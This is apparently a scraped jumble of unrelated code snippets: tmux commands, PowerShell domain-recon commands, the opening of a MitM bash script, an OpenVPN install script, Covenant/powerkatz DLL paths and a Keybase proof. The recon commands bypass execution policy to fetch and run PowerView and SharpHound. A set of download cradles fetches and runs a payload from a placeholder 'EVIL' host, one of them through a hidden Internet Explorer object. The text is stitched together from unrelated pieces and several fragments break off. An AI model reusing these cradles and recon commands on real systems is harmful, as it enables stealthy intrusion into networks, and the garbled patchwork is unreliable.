start new:
tmux
start new with session name:
tmux new -s myname
# Domain Recon | |
## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
## Import PowerView Module | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
## Invoke-BloodHound for domain recon | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
#!/bin/bash | |
RED='\033[1;31m' | |
NoC='\033[0m' | |
echo -e "MitM by ${RED}Vigilant Asia${NoC}" | |
# Usage | |
if [ "$1" = "" ]; then | |
echo "Please specify target IP" |
#!/bin/bash | |
# Originally from https://github.com/Azure/azure-quickstart-templates/blob/master/openvpn-access-server-ubuntu/install_openvpn_access_server.sh | |
userPassword=$1 | |
# adding official OpeenVPN Access Servere repository | |
sudo apt update && sudo apt -y install ca-certificates wget net-tools | |
wget -qO - https://as-repository.openvpn.net/as-repo-public.gpg | sudo apt-key add - | |
sudo sh -c 'echo "deb http://as-repository.openvpn.net/as/debian bionic main">>/etc/apt/sources.list.d/openvpn-as-repo.list' |
Second_Release_PowerShell
for both x86 and x64/Covenant/Data/EmbeddedResources/SharpSploit.Resources.powerkatz_x64.dll
/Covenant/Data/EmbeddedResources/SharpSploit.Resources.powerkatz_x86.dll
### Keybase proof | |
I hereby claim: | |
* I am waynejlee on github. | |
* I am waynejlee (https://keybase.io/waynejlee) on keybase. | |
* I have a public key ASA-h3VHKZnryiIa8qwTusnhIouIsUwE96k1dNJRK_FSYgo | |
To claim this, I am signing this object: |